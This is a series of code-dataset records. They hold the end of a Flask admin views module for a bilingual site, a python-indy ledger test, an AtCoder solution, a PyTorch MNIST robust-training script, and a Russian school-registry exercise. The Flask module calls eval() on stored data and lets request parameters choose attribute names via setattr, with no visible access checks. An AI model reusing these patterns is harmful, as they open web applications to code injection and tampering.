db.session.commit()\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_entrance')\ndef main_entrance():\n entrance = MainEntrance.query.order_by(MainEntrance.id.asc()).all()\n return render_template(\"admin/main_entrance.html\", entrance=entrance)\n\n\n@manage.route('/main_entrance/add', methods=['GET', 'POST'])\ndef main_entrance_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = MainEntrance.query.get(id)\n\n return render_template(\"admin/main_entrance_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_url = request.values.get('ch_url', '')\n en_url = request.values.get('en_url', '')\n ch_summary = request.values.get('ch_summary', '')\n en_summary = request.values.get('en_summary', '')\n cover = request.values.get('cover', '')\n\n slider = MainEntrance.query.get(id)\n if not slider:\n slider = MainEntrance()\n\n slider.ch_title = ch_title\n slider.ch_url = ch_url\n slider.ch_summary = ch_summary\n\n slider.en_title = en_title\n slider.en_url = en_url\n slider.en_summary = en_summary\n slider.cover = cover\n db.session.add(slider)\n\n return redirect(url_for('manage.main_entrance'))\n\n\n\n\n\n\n@manage.route('/main_news')\ndef main_news():\n page = request.args.get('page', 1, type=int)\n pagination = MainNews.query.order_by(MainNews.create_time.desc()).paginate(page, per_page=10, error_out=False)\n news = pagination.items\n return render_template(\"admin/main_news.html\", news=news, pagination=pagination)\n\n\n@manage.route('/main_news/add', methods=['GET', 'POST'])\ndef main_news_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n news = MainNews.query.get(id)\n\n return render_template(\"admin/main_news_detail.html\", news=news)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_author = request.values.get('ch_author', '')\n en_author = request.values.get('en_author', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n news = MainNews.query.get(id)\n if not news:\n news = MainNews()\n\n news.ch_title = ch_title\n news.en_title = en_title\n news.ch_author = ch_author\n news.en_author = en_author\n news.ch_content = ch_content\n news.en_content = en_content\n db.session.add(news)\n\n return redirect(url_for('manage.main_news'))\n\n\n@manage.route('/main_news//')\ndef main_news_state(id, state):\n news = MainNews.query.get(id)\n news.state = state\n\n if state == 0:\n flash(u'BLOG:<%s>已隐藏' % news.ch_title)\n elif state == 1:\n flash(u'BLOG:<%s>已外显' % news.ch_title)\n elif state == 2:\n flash(u'BLOG:<%s>已删除' % news.ch_title)\n db.session.delete(news)\n db.session.commit()\n\n return redirect(url_for('manage.main_news'))\n\n\n@manage.route('/main_news//content', methods=['GET', 'POST'])\ndef main_news_content(id):\n if request.method == 'GET':\n lang = request.args.get('lang', 'ch', type=str)\n news = MainNews.query.get_or_404(id)\n\n return render_template(\"admin/main_news_content.html\", news=news, lang=lang)\n else:\n\n id = request.values.get('id', 0)\n lang = request.values.get('lang', 'cn')\n content = request.values.get('html', '')\n\n news = MainNews.query.get(id)\n if lang == 'cn':\n news.ch_content = content\n else:\n news.en_content = content\n\n db.session.add(news)\n\n return redirect(url_for('manage.main_news'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n@manage.route('/design_carousel')\ndef design_carousel():\n carousels = DesignCarousel.query.order_by(DesignCarousel.sort.asc()).all()\n return render_template(\"admin/design_carousel.html\", carousels=carousels)\n\n\n@manage.route('/design_carousel/add', methods=['GET', 'POST'])\ndef design_carousel_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = DesignCarousel.query.get(id)\n\n return render_template(\"admin/design_carousel_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n\n slider = DesignCarousel.query.get(id)\n if not slider:\n slider = DesignCarousel()\n\n slider.ch_title = ch_title\n slider.en_title = en_title\n slider.web_cover = web_cover\n slider.wap_cover = wap_cover\n db.session.add(slider)\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_carousel//')\ndef design_carousel_state(id, state):\n slider = DesignCarousel.query.get(id)\n slider.state = state\n\n if state == 0:\n flash(u'轮播图:<%s>已隐藏' % slider.ch_title)\n elif state == 1:\n\n flash(u'轮播图:<%s>已外显' % slider.ch_title)\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_carousel//sort/')\ndef design_carousel_sort(id, move):\n slider = DesignCarousel.query.get(id)\n\n if (slider.sort == 1 and move == 'up') or (slider.sort == 12 and move == 'down'):\n pass\n else:\n if move == 'up':\n tmp_s = DesignCarousel.query.filter_by(sort=slider.sort - 1).first()\n\n slider.sort -= 1\n tmp_s.sort += 1\n else:\n tmp_s = DesignCarousel.query.filter_by(sort=slider.sort + 1).first()\n\n slider.sort += 1\n tmp_s.sort -= 1\n\n db.session.add(slider)\n db.session.add(tmp_s)\n db.session.commit()\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_news')\ndef design_news():\n page = request.args.get('page', 1, type=int)\n pagination = DesignNews.query.order_by(DesignNews.create_time.desc()).paginate(page, per_page=10, error_out=False)\n news = pagination.items\n return render_template(\"admin/design_news.html\", news=news, pagination=pagination)\n\n\n@manage.route('/design_news/add', methods=['GET', 'POST'])\ndef design_news_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n news = DesignNews.query.get(id)\n\n return render_template(\"admin/design_news_detail.html\", news=news)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_author = request.values.get('ch_author', '')\n en_author = request.values.get('en_author', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n news = DesignNews.query.get(id)\n if not news:\n news = DesignNews()\n\n news.ch_title = ch_title\n news.en_title = en_title\n news.ch_author = ch_author\n news.en_author = en_author\n news.ch_content = ch_content\n news.en_content = en_content\n db.session.add(news)\n\n return redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_news//')\ndef design_news_state(id, state):\n news = DesignNews.query.get(id)\n news.state = state\n\n if state == 0:\n flash(u'BLOG:<%s>已隐藏' % news.ch_title)\n elif state == 1:\n flash(u'BLOG:<%s>已外显' % news.ch_title)\n elif state == 2:\n flash(u'BLOG:<%s>已删除' % news.ch_title)\n db.session.delete(news)\n db.session.commit()\n\n return redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_news//content', methods=['GET', 'POST'])\ndef design_news_content(id):\n if request.method == 'GET':\n lang = request.args.get('lang', 'ch', type=str)\n news = DesignNews.query.get_or_404(id)\n\n return render_template(\"admin/design_news_content.html\", news=news, lang=lang)\n else:\n\n id = request.values.get('id', 0)\n lang = request.values.get('lang', 'cn')\n content = request.values.get('html', '')\n\n news = DesignNews.query.get(id)\n if lang == 'cn':\n news.ch_content = content\n else:\n news.en_content = content\n\n db.session.add(news)\n\n return redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_project')\ndef design_project():\n page = request.args.get('page', 1, type=int)\n pagination = DesignProject.query.order_by(DesignProject.create_time.desc()).paginate(page, per_page=10,\n error_out=False)\n project = pagination.items\n return render_template(\"admin/design_project.html\", project=project, pagination=pagination)\n\n\n@manage.route('/design_project/add', methods=['GET', 'POST'])\ndef design_project_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n project = DesignProject.query.get(id)\n\n return render_template(\"admin/design_project_detail.html\", project=project)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_author = request.values.get('ch_author', '')\n en_author = request.values.get('en_author', '')\n cover = request.values.get('cover', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n project = DesignProject.query.get(id)\n if not project:\n project = DesignProject()\n\n project.cover = cover\n project.ch_title = ch_title\n project.en_title = en_title\n project.ch_author = ch_author\n project.en_author = en_author\n project.ch_content = ch_content\n project.en_content = en_content\n db.session.add(project)\n\n return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project//')\ndef design_project_state(id, state):\n project = DesignProject.query.get(id)\n project.state = state\n\n if state == 0:\n flash(u'项目:<%s>已隐藏' % project.ch_title)\n elif state == 1:\n flash(u'项目:<%s>已外显' % project.ch_title)\n elif state == 2:\n flash(u'项目:<%s>已删除' % project.ch_title)\n db.session.delete(project)\n db.session.commit()\n\n return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project//content', methods=['GET', 'POST'])\ndef design_project_content(id):\n if request.method == 'GET':\n lang = request.args.get('lang', 'ch', type=str)\n project = DesignProject.query.get_or_404(id)\n\n return render_template(\"admin/design_project_content.html\", project=project, lang=lang)\n else:\n\n id = request.values.get('id', 0)\n lang = request.values.get('lang', 'cn')\n content = request.values.get('html', '')\n\n project = DesignProject.query.get(id)\n if lang == 'cn':\n project.ch_content = content\n else:\n project.en_content = content\n\n db.session.add(project)\n\n return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project//pictures', methods=['GET', 'POST'])\ndef design_project_pictures(id):\n if request.method == 'GET':\n project = DesignProject.query.get_or_404(id)\n pictures = []\n if project.pictures:\n pictures = eval(project.pictures)\n return render_template(\"admin/design_project_pictures.html\", project=project, pictures=pictures)\n else:\n\n id = request.values.get('id', 0)\n pictures = request.values.get('pictures', '')\n if pictures:\n pictures = pictures.split(',')\n else:\n pictures = []\n project = DesignProject.query.get(id)\n project.pictures = str(pictures if pictures[0] else pictures[1:])\n\n db.session.add(project)\n\n return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/events')\ndef events():\n page = request.args.get('page', 1, type=int)\n pagination = Event.query.order_by(Event.create_time.desc()).paginate(page, per_page=10, error_out=False)\n events = pagination.items\n return render_template(\"admin/events.html\", events=events, pagination=pagination)\n\n\n@manage.route('/events/add', methods=['GET', 'POST'])\ndef events_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n events = Event.query.get(id)\n\n return render_template(\"admin/events_detail.html\", events=events)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n ch_content = request.values.get('ch_ontent', '')\n en_content = request.values.get('en_content', '')\n end_time = request.values.get('end_time', datetime.datetime.now())\n\n events = Event.query.get(id)\n if not events:\n events = Event()\n\n events.ch_title = ch_title\n events.en_title = en_title\n events.web_cover = web_cover\n events.wap_cover = wap_cover\n events.ch_content = ch_content\n events.en_content = en_content\n events.end_time = end_time\n db.session.add(events)\n\n return redirect(url_for('manage.events'))\n\n\n@manage.route('/events//')\ndef events_state(id, state):\n events = Event.query.get(id)\n events.state = state\n\n if state == 0:\n flash(u'活动:<%s>已隐藏' % events.ch_title)\n elif state == 1:\n flash(u'活动:<%s>开始' % events.ch_title)\n elif state == 2:\n flash(u'活动:<%s>结束' % events.ch_title)\n\n return redirect(url_for('manage.events'))\n\n\n@manage.route('/events//content', methods=['GET', 'POST'])\ndef events_content(id):\n if request.method == 'GET':\n lang = request.args.get('lang', 'ch', type=str)\n events = Event.query.get_or_404(id)\n\n return render_template(\"admin/events_content.html\", events=events, lang=lang)\n else:\n\n id = request.values.get('id', 0)\n lang = request.values.get('lang', 'cn')\n content = request.values.get('html', '')\n\n events = Event.query.get(id)\n if lang == 'cn':\n events.ch_content = content\n else:\n events.en_content = content\n\n db.session.add(events)\n\n return redirect(url_for('manage.events'))\n\n\n@manage.route('/emembers')\ndef emembers():\n page = request.args.get('page', 1, type=int)\n event_id = request.args.get('id', 0, type=int)\n pagination = EventMember.query \\\n .filter_by(event_id=event_id) \\\n .order_by(EventMember.create_time.asc()) \\\n .paginate(page, per_page=1000, error_out=False)\n emembers = pagination.items\n return render_template(\"admin/emembers.html\", emembers=emembers, pagination=pagination)\n\n\n@manage.route('/contacts')\ndef contacts():\n page = request.args.get('page', 1, type=int)\n pagination = Contact.query \\\n .order_by(Contact.create_time.desc()) \\\n .paginate(page, per_page=1000, error_out=False)\n contacts = pagination.items\n return render_template(\"admin/contact.html\", contacts=contacts, pagination=pagination)\n\n\n@manage.route('/hotword')\ndef hotword():\n hotword = HotWord.query.all()\n return render_template(\"admin/hotword.html\", hotword=hotword)\n\n\n@manage.route('/hotword_detail/add', methods=['GET', 'POST'])\ndef hotword_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n hotword = HotWord.query.get(id)\n\n return render_template(\"admin/hotword_detail.html\", hotword=hotword)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n\n hotword = HotWord.query.get(id)\n if not hotword:\n hotword = HotWord()\n\n hotword.ch_title = ch_title\n hotword.en_title = en_title\n db.session.add(hotword)\n\n return redirect(url_for('manage.hotword'))\n\n\n@manage.route('/hotword//')\ndef hotword_state(id, state):\n hotword = HotWord.query.get(id)\n hotword.state = state\n\n if state == 0:\n flash(u'推荐词:<%s>已隐藏' % hotword.ch_title)\n elif state == 1:\n flash(u'推荐词:<%s>开始' % hotword.ch_title)\n elif state == 2:\n flash(u'推荐词:<%s>结束' % hotword.ch_title)\n\n return redirect(url_for('manage.hotword'))\n\n\n@manage.route('/other')\ndef other():\n return render_template(\"admin/other.html\")\n\n\n@manage.route('/other/detail', methods=['GET', 'POST'])\ndef other_detail():\n if request.method == 'GET':\n other = Other.query.get(1)\n tp = request.values.get('type', '')\n return render_template(\"admin/other_detail.html\", content=other.__getattribute__(tp), tp=tp)\n else:\n other = Other.query.get(1)\n\n content = request.values.get('content', '')\n tp = request.values.get('tp', '')\n setattr(other, tp, content)\n db.session.add(other)\n\n return redirect(url_for('manage.other'))\n\n\n@manage.route('/main_about')\ndef main_about():\n rows = AppleOther.query.filter_by(style=0, state=1).order_by(AppleOther.sort.asc()).all()\n\n return render_template(\"admin/appleother.html\", rows=rows, s=0)\n\n\n@manage.route('/main_contact')\ndef main_contact():\n rows = AppleOther.query.filter_by(style=1, state=1).order_by(AppleOther.sort.asc()).all()\n return render_template(\"admin/appleother.html\", rows=rows, s=1)\n\n\n@manage.route('/design_history')\ndef design_history():\n rows = AppleOther.query.filter_by(style=2, state=1).order_by(AppleOther.sort.asc()).all()\n return render_template(\"admin/appleother.html\", rows=rows, s=2)\n\n\n@manage.route('/design_about')\ndef design_about():\n rows = AppleOther.query.filter_by(style=3, state=1).order_by(AppleOther.sort.asc()).all()\n return render_template(\"admin/appleother.html\", rows=rows, s=3)\n\n\n@manage.route('/design_contact')\ndef design_contact():\n rows = AppleOther.query.filter_by(style=4, state=1).order_by(AppleOther.sort.asc()).all()\n return render_template(\"admin/appleother.html\", rows=rows, s=4)\n\n\n@manage.route('/appleother/add', methods=['GET', 'POST'])\ndef appleother_detail():\n url = ''\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n s = request.args.get('s', 0, type=int)\n other = AppleOther.query.get(id)\n\n if other:\n other.ch_content = other.ch_content.replace('
', '\\r\\n').replace('
', '\\n')\n other.en_content = other.en_content.replace('
', '\\r\\n').replace('
', '\\n')\n return render_template(\"admin/appleother_detail.html\", other=other, s=s)\n else:\n id = request.values.get('id', 0)\n s = int(request.values.get('s', 0))\n stype = int(request.values.get('stype', 0))\n color = int(request.values.get('color', 0))\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n other = AppleOther.query.get(id)\n if not other:\n other = AppleOther()\n other.style = s\n\n other.sort = AppleOther.query.filter_by(style=s).count() + 1\n\n other.stype = stype\n other.color = color\n\n other.web_cover = web_cover\n other.wap_cover = wap_cover\n other.ch_title = ch_title\n other.en_title = en_title\n\n other.ch_content = ch_content\n other.en_content = en_content\n other.state = 1\n db.session.add(other)\n\n url = 'manage.' + ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][other.style]\n\n return redirect(url_for(url))\n\n\n@manage.route('/appleother//')\ndef appleother_state(id, state):\n other = AppleOther.query.get(id)\n other.state = state\n\n url = 'manage.' + ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][other.style]\n\n if state == 0:\n flash(u'推荐词:<%s>已删除' % other.ch_title)\n elif state == 1:\n flash(u'推荐词:<%s>显示' % other.ch_title)\n\n return redirect(url_for(url))\n\n\n@manage.route('/appleother//sort/')\ndef appleother_sort(id, move):\n ao = AppleOther.query.get(id)\n\n first_sort = AppleOther.query.filter_by(style=ao.style, state=1).order_by(AppleOther.sort.asc()).first()\n last_sort = AppleOther.query.filter_by(style=ao.style, state=1).order_by(AppleOther.sort.desc()).first()\n\n if (ao.sort == first_sort.sort and move == 'up') or (ao.sort == last_sort.sort and move == 'down'):\n pass\n else:\n if move == 'up':\n tmp_s = AppleOther.query.filter_by(sort=ao.sort - 1, style=ao.style, state=1).first()\n ao.sort -= 1\n tmp_s.sort += 1\n\n else:\n tmp_s = AppleOther.query.filter_by(sort=ao.sort + 1, style=ao.style, state=1).first()\n ao.sort += 1\n tmp_s.sort -= 1\n\n db.session.add(ao)\n db.session.add(tmp_s)\n db.session.commit()\n\n url = 'manage.' + ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][ao.style]\n\n return redirect(url_for(url))\n","sub_path":"app/manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"246560706","text":"from indy import ledger\n\nimport json\nimport pytest\n\n\n@pytest.mark.asyncio\nasync def test_build_get_revoc_reg_request_work():\n identifier = \"Th7MpTaRZVRYnPiabds81Y\"\n\n rev_reg_def_id = \"RevocRegID\"\n timestamp = 100\n\n expected_response = {\n \"operation\": {\n \"type\": \"116\",\n \"revocRegDefId\": rev_reg_def_id,\n \"timestamp\": timestamp\n }\n }\n\n request = json.loads(await ledger.build_get_revoc_reg_request(identifier, rev_reg_def_id, timestamp))\n assert expected_response.items() <= request.items()\n","sub_path":"wrappers/python/tests/ledger/test_build_get_revoc_reg_request.py","file_name":"test_build_get_revoc_reg_request.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"105083308","text":"input = open('input.txt','r').readline\n\nimport heapq\n\nn = int(input())\na = list(map(int, input().split()))\ndic = {}; ans = []\nfor i in range(n+1)[1:]:\n dic.setdefault(a[i-1],[]).append(i)\nheapq.heapify(a)\nfor i in range(n):\n res = heapq.heappop(a)\n ans.append(dic[res][0])\nprint(*ans)","sub_path":"121---Atcorder/abc142/c/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543493633","text":"# -*- coding: utf-8 -*-\n\n### basic modules\nimport numpy as np\nimport time, pickle, os, sys, json, PIL, tempfile, warnings, importlib, math, copy, shutil, setproctitle\nfrom datetime import datetime\n\n### torch modules\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR, MultiStepLR\nimport torch.nn.functional as F\nfrom torch import autograd\n\nfrom torch.utils.data import Dataset, DataLoader, TensorDataset\nfrom torch.optim.lr_scheduler import StepLR, MultiStepLR\nimport data_load, BCP, utils\n\nif __name__ == \"__main__\":\n args = utils.argparser(data='mnist',epochs=60,warmup=1,rampup=20,batch_size=50,epsilon=1.58,epsilon_infty=0.1,epsilon_train=1.58,epsilon_train_infty=0.1,augmentation=False,lr=0.0003,lr_scheduler='multistep',wd_list=[21,30,40],gamma=0.1,opt_iter=10)\n print(datetime.now())\n print(args)\n print('saving file to {}'.format(args.prefix))\n setproctitle.setproctitle(args.prefix)\n train_log = open(args.prefix + \"_train.log\", \"w\")\n test_log = open(args.prefix + \"_test.log\", \"w\")\n train_loader, _ = data_load.data_loaders(args.data, args.batch_size, augmentation=args.augmentation, normalization=args.normalization, drop_last=args.drop_last, shuffle=args.shuffle)\n _, test_loader = data_load.data_loaders(args.data, args.test_batch_size, augmentation=args.augmentation, normalization=args.normalization, drop_last=args.drop_last, shuffle=args.shuffle)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n for X,y in train_loader: \n break \n \n best_err = 1\n err = 1\n sampler_indices = []\n model = [utils.select_model(args.data, args.model)]\n print(model[-1]) \n if args.opt == 'adam': \n opt = optim.Adam(model[-1].parameters(), lr=args.lr)\n elif args.opt == 'sgd': \n opt = optim.SGD(model[-1].parameters(), lr=args.lr, \n momentum=args.momentum,\n weight_decay=args.weight_decay) \n print(opt)\n if args.lr_scheduler == 'step':\n lr_scheduler = optim.lr_scheduler.StepLR(opt, step_size=args.step_size, gamma=args.gamma)\n elif args.lr_scheduler =='multistep':\n lr_scheduler = MultiStepLR(opt, milestones=args.wd_list, gamma=args.gamma)\n print(lr_scheduler)\n eps_schedule = np.linspace(args.starting_epsilon,\n args.epsilon_train, \n args.schedule_length)\n \n kappa_schedule = np.linspace(args.starting_kappa, \n args.kappa, \n args.kappa_schedule_length)\n u_list = None\n for t in range(args.epochs): \n if t < args.warmup:\n epsilon = 0\n epsilon_next = 0\n elif args.warmup <= t < args.warmup+len(eps_schedule) and args.starting_epsilon is not None: \n epsilon = float(eps_schedule[t-args.warmup])\n epsilon_next = float(eps_schedule[np.min((t+1-args.warmup, len(eps_schedule)-1))])\n else:\n epsilon = args.epsilon_train\n epsilon_next = args.epsilon_train\n \n if t < args.warmup:\n kappa = 1\n kappa_next = 1\n elif args.warmup <= t < args.warmup+len(kappa_schedule):\n kappa = float(kappa_schedule[t-args.warmup])\n kappa_next = float(kappa_schedule[np.min((t+1-args.warmup, len(kappa_schedule)-1))])\n else:\n kappa = args.kappa\n kappa_next = args.kappa\n print('%.f th epoch: epsilon: %.7f - %.7f, kappa: %.4f - %.4f, lr: %.7f'%(t,epsilon,epsilon_next,kappa,kappa_next,opt.state_dict()['param_groups'][0]['lr']))\n \n if t < args.warmup:\n utils.train(train_loader, model[-1], opt, t, train_log, args.verbose)\n _ = utils.evaluate(test_loader, model[-1], t, test_log, args.verbose)\n elif args.method == 'BCP' and args.warmup <= t:\n st = time.time()\n u_list = BCP.train_BCP(train_loader, model[-1], opt, epsilon, kappa, t, train_log, args.verbose, args, u_list)\n print('Taken', time.time()-st, 's/epoch')\n \n err = BCP.evaluate_BCP(test_loader, model[-1], epsilon_next, t, test_log, args.verbose, args, u_list)\n \n \n if args.lr_scheduler == 'step': \n if max(t - (args.rampup + args.warmup - 1) + 1, 0):\n print(\"LR DECAY STEP\")\n lr_scheduler.step(epoch=max(t - (args.rampup + args.warmup - 1) + 1, 0))\n elif args.lr_scheduler =='multistep':\n print(\"LR DECAY STEP\")\n lr_scheduler.step(epoch=t) \n else:\n raise ValueError(\"Wrong LR scheduler\")\n \n if t>=args.warmup+len(eps_schedule): \n if err < best_err and args.save: \n print('Best Error Found! %.3f'%err)\n best_err = err\n torch.save({\n 'state_dict' : [m.state_dict() for m in model], \n 'err' : best_err,\n 'epoch' : t,\n 'sampler_indices' : sampler_indices\n }, args.prefix + \"_best.pth\")\n\n torch.save({ \n 'state_dict': [m.state_dict() for m in model],\n 'err' : err,\n 'epoch' : t,\n 'sampler_indices' : sampler_indices\n }, args.prefix + \"_checkpoint.pth\") \n\n args.print = True\n \n aa = torch.load(args.prefix + \"_best.pth\")['state_dict'][0]\n model_eval = utils.select_model(args.data, args.model)\n model_eval.load_state_dict(aa)\n print('std testing ...')\n std_err = utils.evaluate(test_loader, model_eval, t, test_log, args.verbose)\n print('pgd testing ...')\n pgd_err = utils.evaluate_pgd(test_loader, model_eval, args)\n print('verification testing ...')\n if args.method=='BCP':\n last_err = BCP.evaluate_BCP(test_loader, model_eval, args.epsilon, t, test_log, args.verbose, args, u_list) \n print('Best model evaluation:', std_err.item(), pgd_err.item(), last_err.item())\n","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389058947","text":"# lesson6-1, normal\n\n\nclass School:\n def __init__(self, school_name, school_adress, teachers, students):\n self._school_name = school_name\n self._school_adress = school_adress\n self._teachers = teachers\n self._students = students\n\n def get_all_classes(self):\n classes = set([student.get_class_room for student in self._students])\n return list(sorted(classes, key=lambda x: int(x[:-1])))\n\n def get_students(self, class_room):\n return [student.get_short_name for student in self._students if\n class_room == student.get_class_room]\n\n def get_teachers(self, class_room):\n return [teacher.get_short_name for teacher in self._teachers if\n class_room in teacher.get_classes]\n\n def find_student(self, student_full_name):\n for person in self._students:\n if student_full_name == person.get_full_name:\n teachers = [teachers.get_short_name for teachers in\n self._teachers if person.get_class_room in\n teachers.get_classes]\n lessons = [teachers.get_courses for teachers in\n self._teachers if person.get_class_room in\n teachers.get_classes]\n parents = person.get_parents\n\n return {\n 'full_name': student_full_name,\n 'class_room': person.get_class_room,\n 'teachers': teachers,\n 'lessons': lessons,\n 'parents': parents\n }\n\n @property\n def name(self):\n return 'Муниципальное образовательное учреждение ' \\\n '\"{}\"'.format(self._school_name)\n\n @property\n def adress(self):\n return '{}'.format(self._school_adress)\n\n\nclass People:\n def __init__(self, last_name, first_name, middle_name):\n self._last_name = last_name\n self._first_name = first_name\n self._middle_name = middle_name\n\n @property\n def get_full_name(self):\n return '{0} {1} {2}'.format(self._last_name,\n self._first_name,\n self._middle_name)\n\n @property\n def get_short_name(self):\n return '{0} {1}.{2}.'.format(self._last_name,\n self._first_name[:1],\n self._middle_name[:1])\n\n\nclass Student(People):\n def __init__(self, last_name, first_name, middle_name,\n class_room, mather, father):\n People.__init__(self, last_name, first_name, middle_name)\n self._class_room = class_room\n self._parents = {\n 'mather': mather,\n 'father': father\n }\n\n @property\n def get_class_room(self):\n return self._class_room\n\n @property\n def get_parents(self):\n return self._parents\n\n\nclass Teacher(People):\n def __init__(self, last_name, first_name, middle_name,\n courses, classes):\n People.__init__(self, last_name, first_name, middle_name)\n self._courses = courses\n self._classes = classes\n\n @property\n def get_courses(self):\n return self._courses\n\n @property\n def get_classes(self):\n return self._classes\n\n\nteachers = [\n Teacher('Жукова', 'Людмила', 'Александровна', 'Математика',\n ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n Teacher('Белик', 'Вячеслав', 'Валерьевич', 'Информатика',\n ['10А', '10Б', '11А', '11Б']),\n Teacher('Лакина', 'Надежда', 'Фёдоровна', 'История',\n ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n Teacher('Мордвинова', 'Татьяна', 'Владимировна', 'Литература',\n ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n Teacher('Лагута', 'Татьяна', 'Ивановна', 'География',\n ['7А', '7Б', '8А', '8Б', '9А', '9Б'])\n ]\n\nstudents = [\n Student('Юрин', 'Александр', 'Александрович', '10Б',\n 'Юрина О. А.', 'Ю��ин А. В.'),\n Student('Пантелеев', 'Евгений', 'Алексеевич', '11А',\n 'Пантелеева Т.В.', 'Пантелеев А.В.'),\n Student('Мотовилов', 'Константин', 'Сергеевич', '11Б',\n 'Мотовилова А.Д.', 'Мотовилов С.А.'),\n Student('Патосин', 'Виталий', 'Николаевич', '10А',\n 'Патосина А.К.', 'Патосин Н.В.'),\n Student('Бочкин', 'Артём', 'Александрович', '9Б',\n 'Бочкина В.А.', 'Бочкин А.Т'),\n Student('Никитин', 'Никита', 'Никитыч', '9А',\n 'Никитина Н.А.', 'Никитин Н.С.'),\n Student('Ягодина', 'Дарья', 'Александровна', '8Б',\n 'Ягодина А.В.', 'Ягодин А.С.'),\n Student('Панфилов', 'Андрей', 'Васильевич', '8А',\n 'Панфилова Е.В.', 'Панфилов В.С.'),\n Student('Андреева', 'Анна', 'Владимировна', '7Б',\n 'Андреева А.Д.', 'Андреев В.А.'),\n Student('Сливкин', 'Михаил', 'Аркадьевич', '7А',\n 'Сливкина А.Г.', 'Сливкин А.С.'),\n Student('Циганков', 'Александр', 'Сергеевич', '10Б',\n 'Цыгакова О. А.', 'Циганков С. В.'),\n Student('Цыганков', 'Алексей', 'Сергеевич', '11А',\n 'Цыгакова О. А.', 'Циганков С. В..'),\n Student('Макарова', 'Ирина', 'Александровна', '11Б',\n 'Макарова А.Д.', 'Макаров А.А.'),\n Student('Кравченко', 'Александр', 'Владимирович', '10А',\n 'Кравченко Е.К.', 'Кравченко В.В.'),\n Student('Беляева', 'Мария', 'Вячеславовна', '9Б',\n 'Беляева В.А.', 'Беляев В.Т'),\n Student('Рыбакова', 'Лидия', 'Константиновна', '9А',\n 'Рыбакова Н.А.', 'Рыбаков К.С.'),\n Student('Абрамкин', 'Ярослав', 'Александрович', '8Б',\n 'Абрамкина А.В.', 'Абрамкин А.С.'),\n Student('Стенькина', 'Анжелла', 'Васильевна', '8А',\n 'Стенькина Е.В.', 'Стенькин В.С.'),\n Student('Садыкова', 'Лилия', 'Владимировна', '7Б',\n 'Садыкова А.Д.', 'Садыков В.А.'),\n Student('Андросова', 'Анна', 'Сергеевна', '7А',\n 'Андросова А.Г.', 'Андросов С.С.'),\n ]\n\n\nschool = School('Гимназия №8', '630068, г.Новосибирск, '\n 'ул.Ученическая 8', teachers, students)\n\nprint(school.name)\nprint(school.adress)\n\nprint('\\nСписок классов школы:')\nprint(', '.join(school.get_all_classes()))\n\nprint('\\nСписок 